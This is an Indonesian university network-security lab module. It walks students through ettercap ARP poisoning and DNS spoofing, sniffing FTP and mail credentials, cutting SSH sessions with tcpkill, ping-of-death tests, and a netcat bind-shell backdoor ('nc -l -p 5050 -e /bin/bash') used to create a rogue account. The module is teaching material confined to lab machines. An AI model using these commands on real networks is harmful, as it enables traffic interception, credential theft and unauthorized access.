Network Security Prodi Telekomunikasi PENS

Modul 2
Dasar Attacking 2

1.1 TUJUAN PEMBELAJARAN:

1. Mengenalkan pada mahasiswa tentang serangan dengan MITM
2. Mahasiswa memahami teknik serangan DNS spoofing
3. Mahasiswa memahami teknik serangan DoS
4. Mahasiswa memahami teknik serangan Backdoor

1.2. DASAR TEORI

Penggunaan jaringan komputer yang sudah tersebar di segala bidang termasuk
Internet, menyebabkan orang dapat berkomunikasi dan berkolaborasi secara real time.
Akan tetapi pada waktu yang bersamaan, tidak menutup kemungkinan terbukanya
pintu bagi attacker untuk melakukan tindakan-tindakan yang umumnya dikenal
dengan cyberspace. Tentu saja harus kita sadari bahwa untuk melakukan cyberspace
diperlukan background pengetahuan yang cukup di bidang informasi dan computer
security.
Pada praktikum ini adalah untuk mendemonstrasikan sebuah pemahaman yang
mungkin dapat mewakili terciptanya security attacks. Dengan menggunakan software
program atau tool gratisan yang tersedia di Internet dan dengan modal pengetahuan
dasar network dan security. Perlu diingat bahwa jenis security attacks ini dapat
menyebabkan kerusakan atau damage dalam beberapa konteks tertentu.
Catatan penting: beberapa perintah adalah ilegal dan sedikit berbahaya untuk
diterapkan dengan tujuan yang tidak baik. Tujuan utama dalam praktikum ini adalah
untuk memperkenalkan tool dalam penanganan yang berhubungan dengan cyberspace.
Mahasiswa dianjurkan untuk mencoba melakukan attack hanya ke
komputer-komputer dalam segmen jaringan di Laboratorium yang dipakai untuk
praktikum ini. Pembuat dokumen ini tidak bertanggung jawab jika pengetahuan
cyberspace ini nantinya disalahgunakan untuk tujuan tertentu (misalnya: menyerang
komputer dosen atau orang lain di kampus, dsb).
Network Security Prodi Telekomunikasi PENS

Konfigurasi Jaringan
Untuk melakukan proses percobaan ini, terlebih dahulu lakukan perintah-perintah
sebagai berikut: (diasumsikan bahwa mahasiswa sudah memahaminya betul, karena
sudah dipelajari dalam mata kuliah sebelumnya)
① Set IP address, netmask, dan properti-properti lainnya,
② Set default gateway,
③ Set DNS server dalam file /etc/resolv.conf, dan
④ Konfigurasi lainnya yang diperlukan.

1.3 TUGAS PENDAHULUAN

1. Sebutkan beberapa tool yang digunakan untuk serangan MITM?
2. Apa perbedaan antara IP Spoofing dan ARP spoofing serta DNS spoofing?

1.4 PERCOBAAN
A. Capture dan manipulasi network traffic
1.1 Man in the middle attack
Ettercap adalah tool yang akan kita pakai di percobaan ini yang digunakan untuk
menjalankan peran man-in-the-middle attack dalam jaringan LAN. Dalam
percobaan ini, kita akan berkonsentrasi dalam penggunaan ARP poisoning attack.
Untuk keterangan lebih detil, silahkan dilihat dalam manual perintah ettercap,
dengan perintah:
man ettercap
man etter.conf
diberikan tipe serangan ARP, gunakan perintah arp yang digunakan untuk melihat
isi dari ARP cache, dengan perintah:
man arp

PERCOBAAN
Grup dibagi menjadi 3: Ajeng, Bayu dan Citra. Kemudian lakukan proses sebagai
berikut:
Network Security Prodi Telekomunikasi PENS

Gambar 1. Skenario man in the middle attack

a. Lakukan dan pastikan kondisi jaringan Ajeng, Bayu dan Citra dalam kondisi
normal, lakukan dengan menggunakan perintah ping dan catat ARP cache
masing-masing PC.
b. Kemudian Citra melakukan sniff ke network traffic dengan perintah tcpdump,
sebagai berikut:
tcpdump –vv –i eth0 icmp
Perhatikan penggunaan network interface (apakah eth0, eth1 atau yang lain).
c. Citra: melakukan attack dengan menggunakan tool ettercap dengan perintah
sebagai berikut:
ettercap –Tq –M arp /IPaddress_Ajeng/ /IPaddress_Bayu/
Program akan berjalan dalam mode interaktif. Citra dapat melihatnya dengan
cara menekan tombol h. Selama proses ettercap tersebut, dalam waktu yang
sama, Citra juga melakukan proses capturing paket dengan tool tcpdump
sebagai berikut:
tcpdump –vv –i eth0 icmp atau tcpdump –vv –i eth0 arp
d. Pada saat itu juga, Ajeng dan Bayu saling melakukan proses ping.

PERTANYAAN:
Jenis network traffic apa yang dapat dilakukan oleh Citra sebelum attack
dilakukan ? Dan jenis network traffic apa yang dapat di-sniff Citra setelah attack ?
Silahkan dianalisa dari hasil capture network traffic bagaimana proses attack dapat
terjadi ? Apa yang terjadi dengan ARP cache dari PC Ajeng, Bayu dan Citra ?
Silahkan print out isi dari ARP cache dengan perintah arp.

Perhatikan Gambar 1 dan coba untuk menjawab pertanyaan berikut:

Dimana hub, switch, router atau bahkan Internet ? dan kapan kemungkinan dapat
melakukan man-in-the-middle attack dengan ARP poisoning dan apa efek yang
akan terjadi ?
Network Security Prodi Telekomunikasi PENS

Tambahan, coba identifikasi kemungkinan penanganan security attack di bawah ini:

a. Citra: memodifikasi file /etc/etter.conf pada baris arp_poison_delay, dengan
setting 1000. Kemudian Citra me-restart ettercap.
b. Bayu menghapus ARP cache baris yang berhubungan dengan PC Ajeng. Setelah
itu, Bayu mencoba ping ke Ajeng.
Apa yang terjadi ? apakah Citra dapat melakukan proses (a) ? apa yang dimaksud
dengan variabel arp_poison_delay ? buktikan lagi dengan merubah setting kembali
ke angka 10.

1.2 DNS spoofing attack

Pada percobaan ini, kita akan melihat bagaimana teknik spoofing diterapkan dalam
DNS. Sama dengan percobaan sebelumnya, ettercap akan digunakan di sini.
Dalam hal ini, man-in-the-middle attack dilakukan antara target PC dan DNS server
dari target PC. Dalam hal ini, ettercap akan berperan dalam “filtering” DNS.

PERCOBAAN
Buat dua grup Ajeng sebagai attacker dan Bayu sebagai target PC (victim).
a. Ajeng merubah file etter.dns dalam /usr/share/ettercap/ dengan:
www.eepis-its.edu A 202.9.85.16
dalam file etter.dns;
b. Bayu mengontrol isi dari file /etc/resolv.conf
c. Coba amati pada saat kondisi normal: Bayu mencoba konek ke web site di
Internet, missal www.eepis-its.edu. Gunakan tcpdump untuk mengecek, dimana
urutan prosesnya dari query DNS dengan perintah:
nslookup www.eepis-its.edu
d. Ajeng: mengidentifikasi IP address dari gateway (petunjuk pakailah perintah
route), kemudian mulai menjalankan DNS spoofing attack dengan perintah:
ettercap –T –M arp:remote /IPaddress_Bayu/ /IPaddress_gateway/ -P
dns_spoof
e. Bayu: mencoba konek lagi ke www.eepis-its.edu.

PERTANYAAN:
Apakah Bayu dapat konek ke www.eepis-its.edu ?
Apakah Ajeng dapat melihat tampilan ettercap ?
Cek konfigurasi dari DNS plug-in dalam file /usr/share/ettercap/etter.dns.
Network Security Prodi Telekomunikasi PENS

Bagaimana attacker mendapatkan hasil yang sama ?, meskipun attacker tidak dekat
dari target PC.

1.3 Sniffing attack

Sniffing adalah sebuah passive attack yang meng-capture paket yang melalui
interface jaringan yang di-set ke mode promiscuous. Artinya dengan jalan ini,
semua paket seharusnya dihiraukan, misalnya MAC address dari interface card, tapi
sebagai gantinya adalah dikopi ke dalam buffer.
Di sini, kita akan menggunakan ettercap yang digunakan untuk mendapatkan
username dan password dari network traffic dari protokol yang umum digunakan,
seperti FTP. Tool yang lain adalah ngrep (http://ngrep.sourceforge.net).

PERCOBAAN
Buat grup Ajeng, Bayu, dan Citra.
a. Ajeng: memodifikasi konfigurasi dalam file /etc/vsftpd.conf dengan cara
uncomment baris berikut:
local_enable = YES
b. Ajeng: menjalankan service ftp.
c. Ajeng: membuat user gaguk dan brahim, dan set password
adduser gaguk
adduser brahim
d. Citra: menjalankan MITM attack dengan ettercap (lihat percobaan sebelumnya).
e. Bayu: konek ke ftp server yang dijalankan oleh Ajeng. Login dan kemudian ia
disconnect dari ftp server.

Sekarang coba extract informasi yang penting dan sensitive dari trafik email:
a. Ajeng: menjalankan Postfix mail server.
b. Citra: menjalankan perintah berikut:
ettercap –T –M arp /IPaddress_Ajeng/25 /IPaddress_Bayu/ -e “Testing
ettercap Citra”
c. Bayu: mengirimkan sebuah e-mail ke gaguk@IPaddress_Ajeng, dengan
perintah:
smtp –h IPaddress_Ajeng gaguk@IPaddress_Ajeng –s “Testing Security”
(tekan CTRL-D setelah selesai meng-edit pesan e-mail).
d. Ajeng: dapat mengcek aplikasi e-mail bahwa user brahim telah menerima pesan.
su – brahim
Network Security Prodi Telekomunikasi PENS

mutt

Sekarang coba untuk melakukan spy:

a. Ajeng menjalankan service http
b. Citra membuka terminal console dan menjalankan perintah:
xhost +
c. Citra menjalankan browser dan menjalankan ettercap dengan mengaktifkan
plug-in remote_browser dengan cara:
su
firefox &
ettercap –T –M arp /IPaddress_Ajeng/80 /IPaddress_Bayu/ -P remote_browser
Catatan: konfigurasi plug-in ada di file /etc/etter.conf.
d. Sekarang, Bayu tidak dapat konek ke browser untuk menuju ke server http
Ajeng, dengan menggunakan perintah:
w3m http://IPaddress_Ajeng/

PERTANYAAN: Apa yang terjadi dengan percobaan di atas ? bagaimana

caranya untuk mengatasi jenis attack sniffing ? sekarang coba untuk login
dengan menggunakan SSH dan capture username dan password: sekarang apa
yang terjadi ?

B. Denial of service attack

PERCOBAAN.
Citra mencoba menjalankan MITM attack ke target PC Ajeng dan Bayu.
a. Ajeng: menjalankan SSH server.
b. Bayu: mencoba konek dengan SSH ke Ajeng dan mencoba menjalankan
beberapa perintah.
c. Citra: membuka terminal console dan mulai melakukan attack dengan
menggunakan perintah tcpkill:
tcpkill –I eth0 host IPaddress_Bayu port 22
d. Bayu: mencoba membuka terminal SSH baru dan konek ke Ajeng dan
berusaha menjalankan beberapa perintah melalui SSH channel tersebut.

PERTANYAAN: apa yang terjadi ketika tcpkill aktif ? coba capture network traffic
pada ketiga PC tersebut. Informasi apa saja yang harus diketahui oleh Citra untuk
memutus koneksi yang dibuat oleh Bayu dan Ajeng ?
Network Security Prodi Telekomunikasi PENS

C. Ping of death
a. Bekerjalah dengan teman sebelah untuk melakukan percobaan ini, setiap
kelompok minimal 2 orang. Satu berfungsi sebagai penyerang, satu berfungsi
sebagai target.
b. Pada komputer target lakukan instalasi paket etherape
# apt-get install etherape

Kemudian jalankan aplikasi tersebut :

# etherape

c. Pada komputer attacker jalankan perintah berikut :

# ping <no_ip_target>

Amati dan catat apa yang terjadi di etherape pada komputer target
# ping –s 6000 <no_ip_target>

Perintah diatas akan mengirim paket sebanyak 6000 byte, amati dan catat apa
yang terjadi pada etherape.

d. Pada komputer target, amati dengan etherape. Cobalah juga jika ping dengan
paket melebihi 65000.
# ping –s 75000 <no_ip_target>

e. Buat Kesimpulan dari percobaan yang anda lakukan

D. Backdoor
a. Bekerjalah dengan teman sebelah untuk melakukan percobaan ini, setiap
kelompok minimal 2 orang. Satu berfungsi sebagai penyerang, satu berfungsi
sebagai target.
b. Pada kedua komputer tersebut lakukan instalasi paket netcat
# apt-get install netcat

c. Pada komputer target (server) buat backdoor dengan netcat

# nc –l –p 5050 –e /bin/bash

NB:

-l : listen, siap menerima koneksi

-p : pada port berapa koneksi diterima

-e : jalankan perintah terminal yaitu /bin/bash

Network Security Prodi Telekomunikasi PENS

Setelah itu cek dengan perintah nmap untuk melihat bahwa port 5050 dalam
keadaan terbuka di sisi server.
# nmap localhost

d. Pada komputer penyerang, lakukan akses terhadap port diatas, kemudian buat
account pada komputer server
# nc 192.168.50.10 5050

debianGUI:~# nc 10.252.42.132 5050

adduser datahack => buat user datahack disisi server
Adding user `datahack' ...
Adding new group `datahack' (1002) ...
Adding new user `datahack' (1002) with group `datahack' ...
Creating home directory `/home/datahack' ...
Copying files from `/etc/skel' ...
datahack => buat password : datahack
datahack => retype password
Changing the user information for datahack
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
y
Is the information correct? [Y/n] y
^C

Pada komputer server, cek apakah account sudah ada untuk : datahack
# cat /etc/passwd

Dari account yang sudah dibuat diatas, lakukan koneksi dengan telnet ke sisi
server, sehingga anda sudah berhasil masuk ke sisi server.
# telnet 192.168.50.10
Network Security Prodi Telekomunikasi PENS

1.5 LAPORAN RESMI

1. Berikan kesimpulan hasil praktikum yang anda lakukan.
2. Simpulkan perbedaan setiap metode yang ada pada percobaan ip spoofing
3. Apa type transport layer yang dipakai ip spoofing, mengapa demikian, beri
penjelasan.
4. Sebutkan metode yang dipakai untuk menangkal arp spoofing dan ip spoofing.